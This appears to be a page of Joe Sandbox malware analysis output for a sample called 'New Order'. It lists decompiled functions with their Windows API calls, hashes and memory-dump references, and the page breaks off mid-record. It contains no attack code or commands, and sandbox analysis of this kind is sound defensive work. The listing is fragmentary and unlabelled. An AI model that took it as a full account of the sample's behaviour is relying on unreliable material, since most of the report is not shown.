Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 059086dbea1a880e3e95c4e97003cd7e0309f01f2239d9dbc89b94072ac82b00
Instruction ID: 608d2352e7141903ab4ca2c22d5594e7441a2a7a79d3edbd93a7fa2c22424a63
Opcode Fuzzy Hash: 059086dbea1a880e3e95c4e97003cd7e0309f01f2239d9dbc89b94072ac82b00
Instruction Fuzzy Hash: 7721B231214211AFD716DB24C845F6A7799AF46329F158258F8268B6B2CB71EC46CBD0

Function 003278F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00328D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0032790A,?,000000FF,?,00328754,00000000,?,0000001C,?,?), ref: 00328D8C
Part of subcall function 00328D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00328DB2
Part of subcall function 00328D7D: lstrcmpiW.KERNEL32(00000000,?,0032790A,?,000000FF,?,00328754,00000000,?,0000001C,?,?), ref: 00328DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00328754,00000000,?,0000001C,?,?,00000000), ref: 00327923
lstrcpyW.KERNEL32(00000000,?), ref: 00327949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00328754,00000000,?,0000001C,?,?,00000000), ref: 00327984

Strings

cdecl, xrefs: 0032797B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 385948133026900c74652a3a49e30a803f6b19adcba8213e765135b0a32395b7
Instruction ID: f863494e94aca166b9cb4dabff33c7c7cab0b77dfed9cb3fb98c2c91dcab84ee
Opcode Fuzzy Hash: 385948133026900c74652a3a49e30a803f6b19adcba8213e765135b0a32395b7
Instruction Fuzzy Hash: A911E63A200312AFCB169F34E845E7A77A9FF85354B50402AF946CB3A4EB319951C7A1

Function 00355660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 003556BB
_wcslen.LIBCMT ref: 003556CD
_wcslen.LIBCMT ref: 003556D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00355816

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: f97dedbddb39df6534db2f63ca710696d395fe649e135154268c7b5bb3547639
Instruction ID: 374a6307d8205c3135fe96ed55a822718f35fde2f26a4a28c4ef5d5c755f40db
Opcode Fuzzy Hash: f97dedbddb39df6534db2f63ca710696d395fe649e135154268c7b5bb3547639
Instruction Fuzzy Hash: E011037160464896DF229FA2CC81EEE77BCEF00366F504026FD05E60A1E770EA88CF60

Function 00321A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00321A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00321A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00321A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00321A8A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4b2b7356128b7781a648253461ae77d0e19fa9ad6f129438e1a5008e93eed894
Instruction ID: 33597bdc48b3e10639259284896ff5db548d35371148c863df11fa2d6a624af1
Opcode Fuzzy Hash: 4b2b7356128b7781a648253461ae77d0e19fa9ad6f129438e1a5008e93eed894
Instruction Fuzzy Hash: FB112A3A901229FFEB119BA4C985FADFB78EB18750F200091E600B7290D671AE50DB94

Function 0032E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0032E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0032E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0032E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0032E24D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 3c8bae6ffc62d23c01629c43a129e14cac0f1cf1f3e53a5c18234aa8660c3920
Instruction ID: 2bddf556d4d2f982ecf3648398544d24f4daa05783880cced24289495dde1b7f
Opcode Fuzzy Hash: 3c8bae6ffc62d23c01629c43a129e14cac0f1cf1f3e53a5c18234aa8660c3920
Instruction Fuzzy Hash: 96110876904369FFC7039BA8EC46A9E7FACEB45315F104216F925E3291D271CD0087A0

Function 002ED1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,002ECFF9,00000000,00000004,00000000), ref: 002ED218
GetLastError.KERNEL32 ref: 002ED224
__dosmaperr.LIBCMT ref: 002ED22B
ResumeThread.KERNEL32(00000000), ref: 002ED249

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: bf6834c8ae8fd0888d05bccab5dd206f7f22142513833921863aff299414e172
Instruction ID: 6b23cc8ffdb6b85bb056a8b002c274d334ebd9f854f7ce78d78dd5454a31a5c3
Opcode Fuzzy Hash: bf6834c8ae8fd0888d05bccab5dd206f7f22142513833921863aff299414e172
Instruction Fuzzy Hash: 0C0126368B5249BFCB115FA7DC05BAE7A6DDF82331F500219FE24960E1CB708921CAA0

Function 002C600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002C604C
GetStockObject.GDI32(00000011), ref: 002C6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 002C606A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5e2a18b5145d098f6c8e7154cef5c7d9514fbdec395f252a3f8037f737556198
Instruction ID: 55396fb56519085edda54ef252241c5abef21b0279e9d0595277555921fea1ed
Opcode Fuzzy Hash: 5e2a18b5145d098f6c8e7154cef5c7d9514fbdec395f252a3f8037f737556198
Instruction Fuzzy Hash: E2116172511609BFEF124F949C58FEABB6DFF0C359F050215FA1462120D7329C60DB90

Function 002E3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 002E3B56

Part of subcall function 002E3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 002E3AD2
Part of subcall function 002E3AA3: ___AdjustPointer.LIBCMT ref: 002E3AED

_UnwindNestedFrames.LIBCMT ref: 002E3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 002E3B7C
CallCatchBlock.LIBVCRUNTIME ref: 002E3BA4

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: fd0933293a348bf87d55a056e6fe605dadfcf6311371971f9e92ebf4d9a106bc
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: CE012D32150189BBDF12AE96CC46DEB3B69EF48759F444018FE4856121C732D971DFA0

Function 002F3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002C13C6,00000000,00000000,?,002F301A,002C13C6,00000000,00000000,00000000,?,002F328B,00000006,FlsSetValue), ref: 002F30A5
GetLastError.KERNEL32(?,002F301A,002C13C6,00000000,00000000,00000000,?,002F328B,00000006,FlsSetValue,00362290,FlsSetValue,00000000,00000364,?,002F2E46), ref: 002F30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002F301A,002C13C6,00000000,00000000,00000000,?,002F328B,00000006,FlsSetValue,00362290,FlsSetValue,00000000), ref: 002F30BF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1d8a0d8d9b71084c78606da015deddce4e23e81f926ee018a1cd647b91934b61
Instruction ID: e178ba88d251a4bff5b07fdcde107928722b7e0005f8ab6ff8b31a27ef26988d
Opcode Fuzzy Hash: 1d8a0d8d9b71084c78606da015deddce4e23e81f926ee018a1cd647b91934b61
Instruction Fuzzy Hash: 0F01B53233132AABCB228A699C44966B79C9F05BE1F100639EA06D3250CF21D951C6D0

Function 00327464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0032747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00327497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003274AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003274CA

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: a4c01b6da5f8817795582f2074e29ac4a82d37239ad54bd4760b32d2f18ddbd5
Instruction ID: 43c1ed43254dfc7e1957861c7e8556ef5e1ce9bcc06cce20c6acbe12e5fa8317
Opcode Fuzzy Hash: a4c01b6da5f8817795582f2074e29ac4a82d37239ad54bd4760b32d2f18ddbd5
Instruction Fuzzy Hash: 9611C4B12153209FE7229F16EC08FA27FFCFB00B04F508569A616D6551D770E904DB91

Function 0032B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0032ACD3,?,00008000), ref: 0032B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0032ACD3,?,00008000), ref: 0032B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0032ACD3,?,00008000), ref: 0032B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0032ACD3,?,00008000), ref: 0032B126

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ee852b30ad94f38bc323172de1a1e3d0ca57fd1651b2852a13b6f4c5e4dfde7e
Instruction ID: 6fc0af3f4d7f604792bd5d39733c76cb54eb0a30c2a77d3f5c6631bc7443de95
Opcode Fuzzy Hash: ee852b30ad94f38bc323172de1a1e3d0ca57fd1651b2852a13b6f4c5e4dfde7e
Instruction Fuzzy Hash: B1115E31C11A3DDBCF02AFE4E9696EEFB78FF09711F114085D981B2151CB3056608B51

Function 00322DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00322DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00322DD6
GetCurrentThreadId.KERNEL32 ref: 00322DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00322DE4

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 46e7efe91532bd3aeded4cd5975f4d69892915c33f425cc2509abbcbd56d6bb1
Instruction ID: 576a4ca17e55085e69b80fe280d60ba0c3fb72ebc2cb25b1ced575f54b4bf498
Opcode Fuzzy Hash: 46e7efe91532bd3aeded4cd5975f4d69892915c33f425cc2509abbcbd56d6bb1
Instruction Fuzzy Hash: 3AE06D72111334BBD7221B72AC0DEEB3E6CEB42BA6F041015B105D10A09AA48A40C6B0

Function 00358863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 002D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D9693
Part of subcall function 002D9639: SelectObject.GDI32(?,00000000), ref: 002D96A2
Part of subcall function 002D9639: BeginPath.GDI32(?), ref: 002D96B9
Part of subcall function 002D9639: SelectObject.GDI32(?,00000000), ref: 002D96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00358887
LineTo.GDI32(?,?,?), ref: 00358894
EndPath.GDI32(?), ref: 003588A4
StrokePath.GDI32(?), ref: 003588B2

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 3e4ee247cc7f7d2f97bf8e5ddcec03b310c14ccda48629a30ce0db2b7d43f7ba
Instruction ID: 540c88f2619e846e6b2b7ce4932c6f44185a2ce8b34c32be86d999784421e452
Opcode Fuzzy Hash: 3e4ee247cc7f7d2f97bf8e5ddcec03b310c14ccda48629a30ce0db2b7d43f7ba
Instruction Fuzzy Hash: 4DF03A36051359BADB136F94AC09FCA3B5DAF06316F048001FA21760F1C7769561CFE5

Function 002D98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 002D98CC
SetTextColor.GDI32(?,?), ref: 002D98D6
SetBkMode.GDI32(?,00000001), ref: 002D98E9
GetStockObject.GDI32(00000005), ref: 002D98F1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 8939f0ddf10b9b50732d1c82c7ecedef1d0e960ace10e7be53b8dd261127abd4
Instruction ID: 27a958f03fc62b28b10356d592cd21c73d93aa4f190e8b472ffed42d5db83b8c
Opcode Fuzzy Hash: 8939f0ddf10b9b50732d1c82c7ecedef1d0e960ace10e7be53b8dd261127abd4
Instruction Fuzzy Hash: 80E06D31254780AEDB225B79AC09BE83F25AB1633AF18821AF6FA580F1C7714690DB10

Function 0032162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00321634
OpenThreadToken.ADVAPI32(00000000,?,?,?,003211D9), ref: 0032163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003211D9), ref: 00321648
OpenProcessToken.ADVAPI32(00000000,?,?,?,003211D9), ref: 0032164F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 01797758be750c59e3798378203db727b46477b9dd77629ca5293e50b7300a6a
Instruction ID: cb61ab7d43504421550c51d0bdc47592a353d4eb197667baba2b3e2b0dd1853f
Opcode Fuzzy Hash: 01797758be750c59e3798378203db727b46477b9dd77629ca5293e50b7300a6a
Instruction Fuzzy Hash: C5E08671612321EFD7711FA0AE0DB4A3B7CFF54B97F154808F645CA0A0D6348440C750

Function 0031D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0031D858
GetDC.USER32(00000000), ref: 0031D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0031D882
ReleaseDC.USER32(?), ref: 0031D8A3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cb0b5a19aa6687f2109ba835cb301aac42be018672e50666515e776062e57f7e
Instruction ID: 7ab07a5f08e80028e4b67b1947077e770f3204555ad626e0284ed2ea7bb86365
Opcode Fuzzy Hash: cb0b5a19aa6687f2109ba835cb301aac42be018672e50666515e776062e57f7e
Instruction Fuzzy Hash: FAE01AB0820304DFCF429FA0D808A6DBBB9FB08316F249009E80AE7260C7388A51EF40

Function 0031D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0031D86C
GetDC.USER32(00000000), ref: 0031D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0031D882
ReleaseDC.USER32(?), ref: 0031D8A3

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 5d6e12cbde9c48eebdcba80061020467a308a2e89fb13c67e0ae4c7f029ed862
Instruction ID: 692638bb13ffe735e76c1bc351704d042edd7fdc8400e7a867814739540cdf91
Opcode Fuzzy Hash: 5d6e12cbde9c48eebdcba80061020467a308a2e89fb13c67e0ae4c7f029ed862
Instruction Fuzzy Hash: 65E09A75820304DFCF529FA0D80866DBBB9FB48716F149449E94AE7260C7785A11DF50

Function 00334D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 002C7620: _wcslen.LIBCMT ref: 002C7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00334ED4

Strings

LPT, xrefs: 00334DFB
*, xrefs: 00334E10

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 26305214e91768ae3631a680d066ec101393c1e5f23d3a7c14cd6eabed2a5048
Instruction ID: e2221f8c5bd9be5dfd99426baa96460d859a97c0f8ecc4712406453f8ad9febd
